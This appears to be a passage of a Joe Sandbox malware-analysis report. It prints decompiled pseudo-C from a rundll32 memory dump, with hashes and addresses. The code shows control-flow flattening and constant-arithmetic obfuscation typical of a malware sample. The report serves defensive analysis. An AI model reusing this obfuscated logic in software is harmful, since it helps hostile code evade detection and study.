                                                                                                                      • Instruction ID: d51f7af0d4dd80c156e1525b80a51b272a79ffda4955bc845039b67c81846b6b
                                                                                                                      • Opcode Fuzzy Hash: 8248eef8b54e5ecb354579a418a4a3fa70159f394bf7605922f3802dd578227e
                                                                                                                      • Instruction Fuzzy Hash: 8EA153715083419FC358CF69C88585BFBE5FFC4398F10492DF69696261D3B18989CF82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E00828586(void* __ecx, void* __edx, intOrPtr _a8) {
                                                                                                                      				char _v520;
                                                                                                                      				char _v1040;
                                                                                                                      				char _v1560;
                                                                                                                      				signed int _v1564;
                                                                                                                      				signed int _v1568;
                                                                                                                      				signed int _v1572;
                                                                                                                      				signed int _v1576;
                                                                                                                      				signed int _v1580;
                                                                                                                      				signed int _v1584;
                                                                                                                      				signed int _v1588;
                                                                                                                      				signed int _v1592;
                                                                                                                      				signed int _v1596;
                                                                                                                      				signed int _v1600;
                                                                                                                      				signed int _v1604;
                                                                                                                      				signed int _v1608;
                                                                                                                      				signed int _v1612;
                                                                                                                      				signed int _v1616;
                                                                                                                      				signed int _v1620;
                                                                                                                      				signed int _v1624;
                                                                                                                      				signed int _v1628;
                                                                                                                      				signed int _v1632;
                                                                                                                      				signed int _v1636;
                                                                                                                      				signed int _v1640;
                                                                                                                      				signed int _v1644;
                                                                                                                      				signed int _v1648;
                                                                                                                      				signed int _v1652;
                                                                                                                      				signed int _v1656;
                                                                                                                      				signed int _v1660;
                                                                                                                      				signed int _v1664;
                                                                                                                      				signed int _v1668;
                                                                                                                      				signed int _v1672;
                                                                                                                      				signed int _v1676;
                                                                                                                      				signed int _v1680;
                                                                                                                      				signed int _v1684;
                                                                                                                      				signed int _v1688;
                                                                                                                      				signed int _v1692;
                                                                                                                      				signed int _v1696;
                                                                                                                      				signed int _v1700;
                                                                                                                      				signed int _v1704;
                                                                                                                      				void* _t336;
                                                                                                                      				void* _t361;
                                                                                                                      				void* _t371;
                                                                                                                      				void* _t386;
                                                                                                                      				void* _t425;
                                                                                                                      				signed int _t426;
                                                                                                                      				signed int _t427;
                                                                                                                      				signed int _t428;
                                                                                                                      				signed int _t429;
                                                                                                                      				signed int _t430;
                                                                                                                      				signed int _t431;
                                                                                                                      				signed int _t432;
                                                                                                                      				signed int _t433;
                                                                                                                      				signed int _t434;
                                                                                                                      				signed int* _t439;
                                                                                                                      
                                                                                                                      				_push(_a8);
                                                                                                                      				_t425 = 0;
                                                                                                                      				_push(0);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0081C325(_t336);
                                                                                                                      				_v1592 = 0xe90366;
                                                                                                                      				_t439 =  &(( &_v1704)[4]);
                                                                                                                      				_v1592 = _v1592 | 0xd8b262de;
                                                                                                                      				_v1592 = _v1592 ^ 0xd8fb63d7;
                                                                                                                      				_t386 = 0x283f0d8;
                                                                                                                      				_v1624 = 0xa39629;
                                                                                                                      				_v1624 = _v1624 >> 4;
                                                                                                                      				_t426 = 0x2c;
                                                                                                                      				_v1624 = _v1624 / _t426;
                                                                                                                      				_v1624 = _v1624 ^ 0x000bae79;
                                                                                                                      				_v1600 = 0xef5a7d;
                                                                                                                      				_t19 =  &_v1600; // 0xef5a7d
                                                                                                                      				_t427 = 0x1f;
                                                                                                                      				_v1600 =  *_t19 / _t427;
                                                                                                                      				_v1600 = _v1600 ^ 0x000c380d;
                                                                                                                      				_v1568 = 0xec630a;
                                                                                                                      				_t28 =  &_v1568; // 0xec630a
                                                                                                                      				_t428 = 0x1c;
                                                                                                                      				_v1568 =  *_t28 / _t428;
                                                                                                                      				_v1568 = _v1568 ^ 0x0002d50e;
                                                                                                                      				_v1668 = 0x697ac4;
                                                                                                                      				_v1668 = _v1668 ^ 0x43408629;
                                                                                                                      				_v1668 = _v1668 << 4;
                                                                                                                      				_v1668 = _v1668 << 0xf;
                                                                                                                      				_v1668 = _v1668 ^ 0xe763f227;
                                                                                                                      				_v1692 = 0xf5db19;
                                                                                                                      				_v1692 = _v1692 ^ 0xaa29ad2f;
                                                                                                                      				_v1692 = _v1692 >> 0xe;
                                                                                                                      				_v1692 = _v1692 << 6;
                                                                                                                      				_v1692 = _v1692 ^ 0x00a75d57;
                                                                                                                      				_v1620 = 0x9b43e;
                                                                                                                      				_v1620 = _v1620 >> 0xa;
                                                                                                                      				_v1620 = _v1620 + 0x190a;
                                                                                                                      				_v1620 = _v1620 ^ 0x0005a1ac;
                                                                                                                      				_v1572 = 0xd92c9a;
                                                                                                                      				_v1572 = _v1572 << 0xc;
                                                                                                                      				_v1572 = _v1572 ^ 0x92c3ac8e;
                                                                                                                      				_v1700 = 0x6f30ff;
                                                                                                                      				_v1700 = _v1700 << 0xe;
                                                                                                                      				_t429 = 0x26;
                                                                                                                      				_v1700 = _v1700 / _t429;
                                                                                                                      				_v1700 = _v1700 >> 0xe;
                                                                                                                      				_v1700 = _v1700 ^ 0x0006fa3f;
                                                                                                                      				_v1684 = 0x78d9c1;
                                                                                                                      				_v1684 = _v1684 * 0x25;
                                                                                                                      				_v1684 = _v1684 | 0x77a8ffeb;
                                                                                                                      				_v1684 = _v1684 ^ 0x77fd8a30;
                                                                                                                      				_v1656 = 0xa4e4c6;
                                                                                                                      				_v1656 = _v1656 + 0xa942;
                                                                                                                      				_v1656 = _v1656 + 0xffff73ad;
                                                                                                                      				_v1656 = _v1656 ^ 0x00a1f1ac;
                                                                                                                      				_v1652 = 0x64ed51;
                                                                                                                      				_v1652 = _v1652 >> 0xf;
                                                                                                                      				_v1652 = _v1652 * 0x5c;
                                                                                                                      				_v1652 = _v1652 ^ 0x00034dfd;
                                                                                                                      				_v1580 = 0x83183a;
                                                                                                                      				_v1580 = _v1580 ^ 0x32eb2c8f;
                                                                                                                      				_v1580 = _v1580 ^ 0x326d5fbf;
                                                                                                                      				_v1564 = 0x95c9ec;
                                                                                                                      				_v1564 = _v1564 >> 6;
                                                                                                                      				_v1564 = _v1564 ^ 0x0008f372;
                                                                                                                      				_v1588 = 0xb1660f;
                                                                                                                      				_v1588 = _v1588 + 0x4492;
                                                                                                                      				_v1588 = _v1588 ^ 0x00bbacbc;
                                                                                                                      				_v1676 = 0x88aa71;
                                                                                                                      				_v1676 = _v1676 << 0xd;
                                                                                                                      				_v1676 = _v1676 | 0x03baa1bf;
                                                                                                                      				_v1676 = _v1676 << 6;
                                                                                                                      				_v1676 = _v1676 ^ 0xffa89651;
                                                                                                                      				_v1632 = 0x868f26;
                                                                                                                      				_v1632 = _v1632 << 1;
                                                                                                                      				_v1632 = _v1632 + 0xffffb6b3;
                                                                                                                      				_v1632 = _v1632 ^ 0x010eb46f;
                                                                                                                      				_v1640 = 0xd64df9;
                                                                                                                      				_v1640 = _v1640 >> 6;
                                                                                                                      				_t430 = 0x32;
                                                                                                                      				_v1640 = _v1640 / _t430;
                                                                                                                      				_v1640 = _v1640 ^ 0x000ccd63;
                                                                                                                      				_v1664 = 0x22c79e;
                                                                                                                      				_t431 = 0xf;
                                                                                                                      				_v1664 = _v1664 * 9;
                                                                                                                      				_v1664 = _v1664 << 0xa;
                                                                                                                      				_v1664 = _v1664 ^ 0x4da35e74;
                                                                                                                      				_v1664 = _v1664 ^ 0xa9bd4987;
                                                                                                                      				_v1696 = 0xf7f994;
                                                                                                                      				_v1696 = _v1696 >> 0xf;
                                                                                                                      				_v1696 = _v1696 << 7;
                                                                                                                      				_v1696 = _v1696 + 0xffff3f9d;
                                                                                                                      				_v1696 = _v1696 ^ 0x000a4602;
                                                                                                                      				_v1648 = 0xefbcda;
                                                                                                                      				_v1648 = _v1648 | 0xaae2c2a8;
                                                                                                                      				_v1648 = _v1648 + 0x86a3;
                                                                                                                      				_v1648 = _v1648 ^ 0xaafdd76e;
                                                                                                                      				_v1680 = 0x28593a;
                                                                                                                      				_v1680 = _v1680 >> 4;
                                                                                                                      				_v1680 = _v1680 | 0x0bfc0be2;
                                                                                                                      				_v1680 = _v1680 + 0x55be;
                                                                                                                      				_v1680 = _v1680 ^ 0x0bf8c584;
                                                                                                                      				_v1596 = 0xd047d1;
                                                                                                                      				_v1596 = _v1596 | 0xaa1708a2;
                                                                                                                      				_v1596 = _v1596 ^ 0xaad8bb32;
                                                                                                                      				_v1604 = 0xf2c56f;
                                                                                                                      				_v1604 = _v1604 << 6;
                                                                                                                      				_v1604 = _v1604 ^ 0x3cb75693;
                                                                                                                      				_v1644 = 0x36719;
                                                                                                                      				_v1644 = _v1644 ^ 0x56bc0977;
                                                                                                                      				_t432 = 7;
                                                                                                                      				_v1644 = _v1644 / _t431;
                                                                                                                      				_v1644 = _v1644 ^ 0x05c6baf7;
                                                                                                                      				_v1672 = 0x1a4ba5;
                                                                                                                      				_v1672 = _v1672 << 2;
                                                                                                                      				_v1672 = _v1672 / _t432;
                                                                                                                      				_v1672 = _v1672 >> 2;
                                                                                                                      				_v1672 = _v1672 ^ 0x0008f53b;
                                                                                                                      				_v1628 = 0xe04a84;
                                                                                                                      				_v1628 = _v1628 | 0x71ddf7de;
                                                                                                                      				_v1628 = _v1628 + 0xd6a7;
                                                                                                                      				_v1628 = _v1628 ^ 0x71f84a11;
                                                                                                                      				_v1688 = 0xb42ba6;
                                                                                                                      				_t433 = 0x24;
                                                                                                                      				_v1688 = _v1688 / _t433;
                                                                                                                      				_v1688 = _v1688 | 0x51e7f8f6;
                                                                                                                      				_v1688 = _v1688 << 0xb;
                                                                                                                      				_v1688 = _v1688 ^ 0x3fc44495;
                                                                                                                      				_v1704 = 0x876d58;
                                                                                                                      				_v1704 = _v1704 + 0x4bbd;
                                                                                                                      				_v1704 = _v1704 ^ 0xe392f1ca;
                                                                                                                      				_v1704 = _v1704 << 5;
                                                                                                                      				_v1704 = _v1704 ^ 0x62a598c6;
                                                                                                                      				_v1636 = 0x545e02;
                                                                                                                      				_v1636 = _v1636 + 0xcb63;
                                                                                                                      				_v1636 = _v1636 << 5;
                                                                                                                      				_v1636 = _v1636 ^ 0x0aae6d2b;
                                                                                                                      				_v1612 = 0x26c885;
                                                                                                                      				_v1612 = _v1612 | 0x5f90e8de;
                                                                                                                      				_t434 = 0x66;
                                                                                                                      				_v1612 = _v1612 * 0x52;
                                                                                                                      				_v1612 = _v1612 ^ 0xa89ce640;
                                                                                                                      				_v1576 = 0x171d42;
                                                                                                                      				_v1576 = _v1576 ^ 0x4acb7e15;
                                                                                                                      				_v1576 = _v1576 ^ 0x4adecc08;
                                                                                                                      				_v1660 = 0xcbbc2;
                                                                                                                      				_v1660 = _v1660 >> 8;
                                                                                                                      				_v1660 = _v1660 / _t434;
                                                                                                                      				_v1660 = _v1660 ^ 0x3398a9eb;
                                                                                                                      				_v1660 = _v1660 ^ 0x33921795;
                                                                                                                      				_v1608 = 0x5e75bf;
                                                                                                                      				_v1608 = _v1608 + 0xa7f5;
                                                                                                                      				_v1608 = _v1608 >> 1;
                                                                                                                      				_v1608 = _v1608 ^ 0x002982b8;
                                                                                                                      				_v1584 = 0x10acd4;
                                                                                                                      				_v1584 = _v1584 + 0x75ec;
                                                                                                                      				_v1584 = _v1584 ^ 0x001a134d;
                                                                                                                      				_v1616 = 0x7387ff;
                                                                                                                      				_v1616 = _v1616 | 0x122d515f;
                                                                                                                      				_v1616 = _v1616 + 0xffffa5db;
                                                                                                                      				_v1616 = _v1616 ^ 0x12702e1c;
                                                                                                                      				L1:
                                                                                                                      				while(_t386 != 0x283f0d8) {
                                                                                                                      					if(_t386 == 0xc593167) {
                                                                                                                      						_push(_v1700);
                                                                                                                      						_push(_v1572);
                                                                                                                      						_push(0x100010fc);
                                                                                                                      						_t361 = E00819F66(_v1692, _v1620, __eflags);
                                                                                                                      						E0082BA6E( &_v1560, __eflags);
                                                                                                                      						E0082B1B5( &_v520, __eflags, _v1684, _v1656, _v1652, _v1580,  *0x1002520c + 0x220, _v1564, _v1588,  *0x1002520c + 8,  &_v1560,  &_v1040, _t361);
                                                                                                                      						E0081A203(_v1676, _v1632, _v1640, _t361);
                                                                                                                      						_t439 =  &(_t439[0x10]);
                                                                                                                      						L8:
                                                                                                                      						_t386 = 0xe92714c;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					if(_t386 == 0xd2f347e) {
                                                                                                                      						_push(_v1680);
                                                                                                                      						_push(_v1648);
                                                                                                                      						_push(0x1000121c);
                                                                                                                      						_t371 = E00819F66(_v1664, _v1696, __eflags);
                                                                                                                      						E0082BA6E( &_v1560, __eflags);
                                                                                                                      						__eflags = 0;
                                                                                                                      						E00815383(_v1596, 0, _v1604,  &_v520,  &_v1560, _v1644, _v1672,  &_v1560,  *0x1002520c + 0x220, _v1628,  &_v1040,  *0x1002520c + 8, _v1688, _t371);
                                                                                                                      						E0081A203(_v1704, _v1636, _v1612, _t371);
                                                                                                                      						_t439 =  &(_t439[0x11]);
                                                                                                                      						goto L8;
                                                                                                                      					}
                                                                                                                      					if(_t386 == 0xe92714c) {
                                                                                                                      						_push(_v1616);
                                                                                                                      						_push(_v1584);
                                                                                                                      						_push(_v1608);
                                                                                                                      						_push(_t425);
                                                                                                                      						_push(_t425);
                                                                                                                      						_push(_v1660);
                                                                                                                      						_push(_t386);
                                                                                                                      						_push(_t425);
                                                                                                                      						__eflags = E00818B00( &_v520, _v1576, __eflags);
                                                                                                                      						_t425 =  !=  ? 1 : _t425;
                                                                                                                      					} else {
                                                                                                                      						if(_t386 != 0x3c91f62) {
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					return _t425;
                                                                                                                      				}
                                                                                                                      				_push(_t386);
                                                                                                                      				E0081DE7B( &_v1040, _v1624, _v1592, _t386, _v1600, _v1568, _v1668);
                                                                                                                      				_t439 =  &(_t439[7]);
                                                                                                                      				_t386 = 0xc593167;
                                                                                                                      				goto L1;
                                                                                                                      			}

























































                                                                                                                      0x008287bb
                                                                                                                      0x008287c3
                                                                                                                      0x008287cb
                                                                                                                      0x008287cf
                                                                                                                      0x008287d7
                                                                                                                      0x008287df
                                                                                                                      0x008287e7
                                                                                                                      0x008287f2
                                                                                                                      0x008287f7
                                                                                                                      0x008287fd
                                                                                                                      0x00828805
                                                                                                                      0x00828812
                                                                                                                      0x00828815
                                                                                                                      0x00828819
                                                                                                                      0x0082881e
                                                                                                                      0x00828826
                                                                                                                      0x0082882e
                                                                                                                      0x00828836
                                                                                                                      0x0082883b
                                                                                                                      0x00828840
                                                                                                                      0x00828848
                                                                                                                      0x00828850
                                                                                                                      0x00828858
                                                                                                                      0x00828860
                                                                                                                      0x00828868
                                                                                                                      0x00828870
                                                                                                                      0x00828878
                                                                                                                      0x0082887d
                                                                                                                      0x00828885
                                                                                                                      0x0082888d
                                                                                                                      0x00828895
                                                                                                                      0x008288a0
                                                                                                                      0x008288ab
                                                                                                                      0x008288b6
                                                                                                                      0x008288be
                                                                                                                      0x008288c3
                                                                                                                      0x008288cb
                                                                                                                      0x008288d3
                                                                                                                      0x008288e1
                                                                                                                      0x008288e2
                                                                                                                      0x008288e8
                                                                                                                      0x008288f0
                                                                                                                      0x008288f8
                                                                                                                      0x00828905
                                                                                                                      0x00828909
                                                                                                                      0x0082890e
                                                                                                                      0x00828916
                                                                                                                      0x0082891e
                                                                                                                      0x00828926
                                                                                                                      0x0082892e
                                                                                                                      0x00828938
                                                                                                                      0x00828944
                                                                                                                      0x00828949
                                                                                                                      0x0082894f
                                                                                                                      0x0082895c
                                                                                                                      0x00828966
                                                                                                                      0x0082896e
                                                                                                                      0x00828976
                                                                                                                      0x0082897e
                                                                                                                      0x00828986
                                                                                                                      0x0082898b
                                                                                                                      0x00828993
                                                                                                                      0x0082899b
                                                                                                                      0x008289a3
                                                                                                                      0x008289a8
                                                                                                                      0x008289b0
                                                                                                                      0x008289b8
                                                                                                                      0x008289c5
                                                                                                                      0x008289c6
                                                                                                                      0x008289ca
                                                                                                                      0x008289d2
                                                                                                                      0x008289dd
                                                                                                                      0x008289e8
                                                                                                                      0x008289f3
                                                                                                                      0x008289fb
                                                                                                                      0x00828a06
                                                                                                                      0x00828a0a
                                                                                                                      0x00828a12
                                                                                                                      0x00828a1a
                                                                                                                      0x00828a22
                                                                                                                      0x00828a2a
                                                                                                                      0x00828a2e
                                                                                                                      0x00828a36
                                                                                                                      0x00828a41
                                                                                                                      0x00828a4c
                                                                                                                      0x00828a57
                                                                                                                      0x00828a5f
                                                                                                                      0x00828a67
                                                                                                                      0x00828a6f
                                                                                                                      0x00000000
                                                                                                                      0x00828a77
                                                                                                                      0x00828a85
                                                                                                                      0x00828b48
                                                                                                                      0x00828b4c
                                                                                                                      0x00828b5b
                                                                                                                      0x00828b60
                                                                                                                      0x00828b6e
                                                                                                                      0x00828bc5
                                                                                                                      0x00828bdd
                                                                                                                      0x00828be2
                                                                                                                      0x00828b41
                                                                                                                      0x00828b41
                                                                                                                      0x00000000
                                                                                                                      0x00828b41
                                                                                                                      0x00828a91
                                                                                                                      0x00828aa8
                                                                                                                      0x00828aac
                                                                                                                      0x00828ab8
                                                                                                                      0x00828abd
                                                                                                                      0x00828ace
                                                                                                                      0x00828b1f
                                                                                                                      0x00828b21
                                                                                                                      0x00828b39
                                                                                                                      0x00828b3e
                                                                                                                      0x00000000
                                                                                                                      0x00828b3e
                                                                                                                      0x00828a95
                                                                                                                      0x00828c1f
                                                                                                                      0x00828c23
                                                                                                                      0x00828c2a
                                                                                                                      0x00828c2e
                                                                                                                      0x00828c2f
                                                                                                                      0x00828c30
                                                                                                                      0x00828c3b
                                                                                                                      0x00828c3c
                                                                                                                      0x00828c4f
                                                                                                                      0x00828c51
                                                                                                                      0x00828a9b
                                                                                                                      0x00828aa1
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00828aa3
                                                                                                                      0x00828aa1
                                                                                                                      0x00828c60
                                                                                                                      0x00828c60
                                                                                                                      0x00828bea
                                                                                                                      0x00828c10
                                                                                                                      0x00828c15
                                                                                                                      0x00828c18
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_810000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: c$:Y($Qd$}Z$~4/$u
                                                                                                                      • API String ID: 0-1069939785
                                                                                                                      • Opcode ID: c07cda194e15ca4fb869fda055bfca267ee7ac069ad45a48e723778288357691
                                                                                                                      • Instruction ID: 5562d1969dc00372ede4b93220831305114a22db70689dedfa2997332ad7fa22
                                                                                                                      • Opcode Fuzzy Hash: c07cda194e15ca4fb869fda055bfca267ee7ac069ad45a48e723778288357691
                                                                                                                      • Instruction Fuzzy Hash: 35F101B25093809FD768CF21C94AA9BBBE1FBC5748F10891CF29A96220C7B58549CF53
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E00811C30() {
                                                                                                                      				char _v520;
                                                                                                                      				char _v1040;
                                                                                                                      				signed int _v1044;
                                                                                                                      				signed int _v1048;
                                                                                                                      				intOrPtr _v1052;
                                                                                                                      				signed int _v1056;
                                                                                                                      				signed int _v1060;
                                                                                                                      				signed int _v1064;
                                                                                                                      				signed int _v1068;
                                                                                                                      				signed int _v1072;
                                                                                                                      				signed int _v1076;
                                                                                                                      				signed int _v1080;
                                                                                                                      				signed int _v1084;
                                                                                                                      				signed int _v1088;
                                                                                                                      				signed int _v1092;
                                                                                                                      				signed int _v1096;
                                                                                                                      				signed int _v1100;
                                                                                                                      				signed int _v1104;
                                                                                                                      				signed int _v1108;
                                                                                                                      				signed int _v1112;
                                                                                                                      				signed int _v1116;
                                                                                                                      				signed int _v1120;
                                                                                                                      				signed int _v1124;
                                                                                                                      				signed int _v1128;
                                                                                                                      				unsigned int _v1132;
                                                                                                                      				signed int _v1136;
                                                                                                                      				signed int _v1140;
                                                                                                                      				signed int _v1144;
                                                                                                                      				signed int _v1148;
                                                                                                                      				signed int _v1152;
                                                                                                                      				signed int _v1156;
                                                                                                                      				signed int _v1160;
                                                                                                                      				signed int _v1164;
                                                                                                                      				signed int _v1168;
                                                                                                                      				void* _t307;
                                                                                                                      				void* _t311;
                                                                                                                      				void* _t312;
                                                                                                                      				signed int _t317;
                                                                                                                      				signed int _t318;
                                                                                                                      				signed int _t319;
                                                                                                                      				signed int _t320;
                                                                                                                      				signed int _t321;
                                                                                                                      				signed int _t322;
                                                                                                                      				intOrPtr _t354;
                                                                                                                      				void* _t361;
                                                                                                                      				signed int* _t365;
                                                                                                                      
                                                                                                                      				_t365 =  &_v1168;
                                                                                                                      				_v1048 = _v1048 & 0x00000000;
                                                                                                                      				_v1044 = _v1044 & 0x00000000;
                                                                                                                      				_v1052 = 0xd27b82;
                                                                                                                      				_v1132 = 0xd68ad;
                                                                                                                      				_t317 = 0x39;
                                                                                                                      				_t361 = 0x31951cf;
                                                                                                                      				_v1132 = _v1132 / _t317;
                                                                                                                      				_v1132 = _v1132 | 0x7a114e95;
                                                                                                                      				_v1132 = _v1132 >> 9;
                                                                                                                      				_v1132 = _v1132 ^ 0x003f4f84;
                                                                                                                      				_v1164 = 0x8948b3;
                                                                                                                      				_v1164 = _v1164 + 0x5689;
                                                                                                                      				_v1164 = _v1164 + 0xffffbb3a;
                                                                                                                      				_t318 = 0x19;
                                                                                                                      				_v1164 = _v1164 * 0x56;
                                                                                                                      				_v1164 = _v1164 ^ 0x2e2b97d6;
                                                                                                                      				_v1072 = 0xcb9c2b;
                                                                                                                      				_v1072 = _v1072 >> 3;
                                                                                                                      				_v1072 = _v1072 ^ 0x001ca36a;
                                                                                                                      				_v1080 = 0x1dbdae;
                                                                                                                      				_v1080 = _v1080 >> 8;
                                                                                                                      				_v1080 = _v1080 ^ 0x00014686;
                                                                                                                      				_v1156 = 0xb5510a;
                                                                                                                      				_v1156 = _v1156 / _t318;
                                                                                                                      				_v1156 = _v1156 ^ 0xc10914df;
                                                                                                                      				_v1156 = _v1156 | 0x9ca0ebe9;
                                                                                                                      				_v1156 = _v1156 ^ 0xdda118ad;
                                                                                                                      				_v1104 = 0x66b826;
                                                                                                                      				_v1104 = _v1104 ^ 0xe9987981;
                                                                                                                      				_v1104 = _v1104 * 0x25;
                                                                                                                      				_v1104 = _v1104 ^ 0xd1d8b52b;
                                                                                                                      				_v1056 = 0xa9a3d5;
                                                                                                                      				_v1056 = _v1056 * 0x6e;
                                                                                                                      				_v1056 = _v1056 ^ 0x48e0209e;
                                                                                                                      				_v1064 = 0xff8e1d;
                                                                                                                      				_v1064 = _v1064 + 0x7d6c;
                                                                                                                      				_v1064 = _v1064 ^ 0x0102ce02;
                                                                                                                      				_v1060 = 0x1cd25;
                                                                                                                      				_v1060 = _v1060 >> 0xe;
                                                                                                                      				_v1060 = _v1060 ^ 0x00092955;
                                                                                                                      				_v1112 = 0x2e454b;
                                                                                                                      				_v1112 = _v1112 ^ 0xdfc484a9;
                                                                                                                      				_v1112 = _v1112 << 4;
                                                                                                                      				_v1112 = _v1112 ^ 0xfea80718;
                                                                                                                      				_v1084 = 0x44c343;
                                                                                                                      				_v1084 = _v1084 * 0x5e;
                                                                                                                      				_v1084 = _v1084 ^ 0x99776358;
                                                                                                                      				_v1084 = _v1084 ^ 0x804f0a92;
                                                                                                                      				_v1148 = 0xd43471;
                                                                                                                      				_v1148 = _v1148 << 0x10;
                                                                                                                      				_v1148 = _v1148 ^ 0xf30ce1ba;
                                                                                                                      				_v1148 = _v1148 | 0x5684f5e4;
                                                                                                                      				_v1148 = _v1148 ^ 0xd7f82c28;
                                                                                                                      				_v1140 = 0xc6d087;
                                                                                                                      				_v1140 = _v1140 * 0xf;
                                                                                                                      				_v1140 = _v1140 / _t318;
                                                                                                                      				_t319 = 0x11;
                                                                                                                      				_v1140 = _v1140 / _t319;
                                                                                                                      				_v1140 = _v1140 ^ 0x000f807a;
                                                                                                                      				_v1076 = 0xeb33ff;
                                                                                                                      				_v1076 = _v1076 | 0x3caa7413;
                                                                                                                      				_v1076 = _v1076 ^ 0x3ce1a50e;
                                                                                                                      				_v1160 = 0xf6df2e;
                                                                                                                      				_v1160 = _v1160 << 3;
                                                                                                                      				_t320 = 0x12;
                                                                                                                      				_v1160 = _v1160 / _t320;
                                                                                                                      				_t321 = 0x23;
                                                                                                                      				_v1160 = _v1160 / _t321;
                                                                                                                      				_v1160 = _v1160 ^ 0x0001c97f;
                                                                                                                      				_v1096 = 0x2990f1;
                                                                                                                      				_v1096 = _v1096 + 0x8b3d;
                                                                                                                      				_v1096 = _v1096 << 4;
                                                                                                                      				_v1096 = _v1096 ^ 0x02a87cfa;
                                                                                                                      				_v1168 = 0x9204f1;
                                                                                                                      				_v1168 = _v1168 << 2;
                                                                                                                      				_v1168 = _v1168 >> 0xe;
                                                                                                                      				_v1168 = _v1168 ^ 0x6a27e144;
                                                                                                                      				_v1168 = _v1168 ^ 0x6a24f645;
                                                                                                                      				_v1068 = 0x63146e;
                                                                                                                      				_v1068 = _v1068 + 0xffffb906;
                                                                                                                      				_v1068 = _v1068 ^ 0x00673218;
                                                                                                                      				_v1124 = 0xa7a9d5;
                                                                                                                      				_v1124 = _v1124 * 0x43;
                                                                                                                      				_v1124 = _v1124 + 0xa631;
                                                                                                                      				_v1124 = _v1124 ^ 0x2beabd88;
                                                                                                                      				_v1144 = 0x5bd0aa;
                                                                                                                      				_v1144 = _v1144 * 6;
                                                                                                                      				_v1144 = _v1144 | 0x1ea27ebc;
                                                                                                                      				_v1144 = _v1144 + 0xffff7d79;
                                                                                                                      				_v1144 = _v1144 ^ 0x1eab8d23;
                                                                                                                      				_v1152 = 0x75499f;
                                                                                                                      				_v1152 = _v1152 >> 7;
                                                                                                                      				_v1152 = _v1152 * 0x3b;
                                                                                                                      				_v1152 = _v1152 * 0x36;
                                                                                                                      				_v1152 = _v1152 ^ 0x0b6e0547;
                                                                                                                      				_v1116 = 0xfc11ad;
                                                                                                                      				_v1116 = _v1116 ^ 0xa8b58fc5;
                                                                                                                      				_v1116 = _v1116 * 0x46;
                                                                                                                      				_v1116 = _v1116 ^ 0x042cd8c8;
                                                                                                                      				_v1088 = 0x98b2ad;
                                                                                                                      				_v1088 = _v1088 + 0x5f8d;
                                                                                                                      				_v1088 = _v1088 << 8;
                                                                                                                      				_v1088 = _v1088 ^ 0x99161df3;
                                                                                                                      				_v1108 = 0xc44bb5;
                                                                                                                      				_v1108 = _v1108 + 0xffff808c;
                                                                                                                      				_v1108 = _v1108 ^ 0x7a0d028c;
                                                                                                                      				_v1108 = _v1108 ^ 0x7ac2537a;
                                                                                                                      				_v1128 = 0x834e58;
                                                                                                                      				_v1128 = _v1128 + 0xffff18d5;
                                                                                                                      				_v1128 = _v1128 << 0xe;
                                                                                                                      				_v1128 = _v1128 + 0xe46a;
                                                                                                                      				_v1128 = _v1128 ^ 0x99c7b134;
                                                                                                                      				_v1136 = 0xd0608e;
                                                                                                                      				_v1136 = _v1136 << 0xd;
                                                                                                                      				_v1136 = _v1136 ^ 0x0f37e4e4;
                                                                                                                      				_v1136 = _v1136 ^ 0x0bc0752d;
                                                                                                                      				_v1136 = _v1136 ^ 0x08ebd133;
                                                                                                                      				_v1120 = 0xe37477;
                                                                                                                      				_v1120 = _v1120 << 0xf;
                                                                                                                      				_v1120 = _v1120 << 0x10;
                                                                                                                      				_v1120 = _v1120 ^ 0x800d4304;
                                                                                                                      				_v1092 = 0xa7d287;
                                                                                                                      				_v1092 = _v1092 * 0x3e;
                                                                                                                      				_v1092 = _v1092 << 0xb;
                                                                                                                      				_v1092 = _v1092 ^ 0x27ebbc9f;
                                                                                                                      				_v1100 = 0xbdc4ed;
                                                                                                                      				_v1100 = _v1100 << 8;
                                                                                                                      				_t322 = 0x37;
                                                                                                                      				_v1100 = _v1100 / _t322;
                                                                                                                      				_v1100 = _v1100 ^ 0x03761b38;
                                                                                                                      				_t307 = E0082FB4A();
                                                                                                                      				do {
                                                                                                                      					while(_t361 != 0x31951cf) {
                                                                                                                      						if(_t361 == 0x3cad130) {
                                                                                                                      							_push( &_v1040);
                                                                                                                      							_push( &_v520);
                                                                                                                      							_push(_v1100);
                                                                                                                      							return E00818195(_v1120, _v1092, __eflags);
                                                                                                                      						}
                                                                                                                      						if(_t361 == 0xac73e1e) {
                                                                                                                      							_push(_v1068);
                                                                                                                      							_push(_v1168);
                                                                                                                      							_push(0x1000113c);
                                                                                                                      							_t311 = E00819F66(_v1160, _v1096, __eflags);
                                                                                                                      							_t312 = E00814EE2(_v1124);
                                                                                                                      							_t354 =  *0x1002520c;
                                                                                                                      							_t266 = _t354 + 0x220; // 0x1002542c
                                                                                                                      							_t268 = _t354 + 8; // 0x10025214
                                                                                                                      							E0082C77B(_t311, __eflags, _v1152, _t312, _t268, _v1116, _t268,  &_v520, _t266, _v1088);
                                                                                                                      							_t307 = E0081A203(_v1108, _v1128, _v1136, _t311);
                                                                                                                      							_t365 =  &(_t365[0xd]);
                                                                                                                      							_t361 = 0x3cad130;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						_t373 = _t361 - 0xc947a3e;
                                                                                                                      						if(_t361 != 0xc947a3e) {
                                                                                                                      							goto L8;
                                                                                                                      						}
                                                                                                                      						_push(_v1104);
                                                                                                                      						_push(_v1156);
                                                                                                                      						_push(0x100010cc);
